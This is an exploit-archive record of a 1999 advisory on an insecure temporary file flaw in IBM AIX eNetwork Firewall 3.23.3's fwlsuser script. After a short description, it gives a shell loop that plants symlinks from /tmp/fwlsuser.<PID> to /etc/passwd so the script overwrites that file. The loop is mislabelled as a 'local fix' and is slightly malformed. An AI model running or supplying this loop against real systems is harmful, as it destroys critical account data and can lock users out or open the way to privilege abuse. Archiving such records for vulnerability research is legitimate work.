IBM AIX eNetwork Firewall 3.23.3 - Insecure Temporary File Creation

1999-05-25T00:00:00
ID EXPLOITPACK:3895B68CE57B7A7475BC7AD6907750BF
Type exploitpack
Reporter Paul Cammidge
Modified 1999-05-25T00:00:00

Description

IBM AIX eNetwork Firewall 3.23.3 - Insecure Temporary File Creation

                                        
                                            soure: https://www.securityfocus.com/bid/287/info

IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file. 

x = 5000
while true

LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit